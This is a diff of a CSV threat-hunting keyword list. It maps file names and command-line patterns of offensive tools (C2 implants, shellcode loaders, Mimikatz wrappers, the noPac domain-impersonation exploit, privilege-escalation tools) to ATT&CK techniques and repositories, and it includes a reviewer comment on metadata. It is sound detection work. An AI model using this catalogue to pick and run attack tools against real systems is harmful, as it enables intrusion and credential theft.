TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*nimplants.html*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*NimShellCodeLoader*","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","555","105","2023-08-26T12:48:08Z","2021-01-19T15:57:01Z" "*NimSyscallLoader -*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "*Ninja c2*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*ninjac2*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*nipe.pl *","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway. Tor enables users to surf the internet. chat and send instant messages anonymously. and is used by a wide variety of people for both licit and illicit purposes. Tor has. for example. been used by criminals enterprises. hacktivism groups. and law enforcement agencies at cross purposes. sometimes simultaneously. Nipe is a script to make the Tor network your default gateway.This Perl script enables you to directly route all your traffic from your computer to the Tor network through which you can surf the internet anonymously without having to worry about being tracked or traced back.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","0","N/A","N/A","10","1692","315","2023-09-22T12:35:29Z","2015-09-07T18:47:10Z" -"*nishang.exe*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*nishang.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*nishang.psm1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*nishang.exe*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*nishang.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*nishang.psm1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*NixImports by dr4k0nia*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","0","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*NixImports.csproj*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*NixImports.exe*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*NixImports.git*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - 
Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*NixImports.sln*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" -"*nmake inject_local *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*nmake inject_local *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" "*nmap/ncrack*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" -"*nmap_smb_scan_custom_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*nmapAnswerMachine.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*nmap_port_scanner.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*nmap_port_scanner_ip_obj.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*nmap_smb_scan_custom_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*nmapAnswerMachine.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*nmap-reverse-lookup*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4pz*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","0","N/A","10","10","4","2","2023-10-02T19:54:24Z","2023-04-28T01:58:18Z" -"*no Mimik@tz - loaded successfully*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*no_session_payload.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4pz*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","0","N/A","10","10","4","2","2023-10-04T12:32:38Z","2023-04-28T01:58:18Z" +"*no Mimik@tz - loaded successfully*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*no_session_payload.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*NoApiUser.exe*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" 
"*noclient: failed to execute %s: %s*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*node stealer.js *","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" -"*NoFault\NoFault.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*NoFault\NoFault.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*NoFilter.exe *","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. 
It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*NoFilter-main.zip*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" -"*nop_shellcode.bin*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*nop_shellcode.bin*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*noPac * -dc-ip * --impersonate *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*noPac.* -create-child*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -dc-host *","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation 
tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" 
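Review bot: The two added `red-python-scripts` rows (`*nmap_port_scanner.py*` and `*nmap_port_scanner_ip_obj.py*`) carry metadata that will mislead anyone who filters or maps this sheet by ATT&CK fields. `T1065` is deprecated in ATT&CK in favour of `T1571`, the category is `Collection` although the listed tactics are `TA0001 - TA0007` and `T1046` is a discovery technique, and the description contains the typo `scirpts`. I would change those fields to `"random networking exploitation scripts","T1190 - T1046 - T1571"` and set the category to `Discovery`, as other rows in the sheet already do. Both rows also set `metadata_enable_proxy_detection` to `0`, whereas script-file keywords elsewhere in this hunk such as `*NimPlant.py*` set it to `1`. If that is deliberate, a short note in `metadata_comment` instead of `N/A` would tell rule authors why these file names are endpoint-only.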
@@ -14139,18 +14302,18 @@ "*noPac.csproj.AssemblyReference.cache*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" "*noPac.py*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.sln*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" -"*NoPowerShell.cna*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard 
Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*NoPowerShell.cna*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*NoPowerShell.Commands*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*NoPowerShell.dll*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*NoPowerShell.dll*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*nopowershell.exe*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" 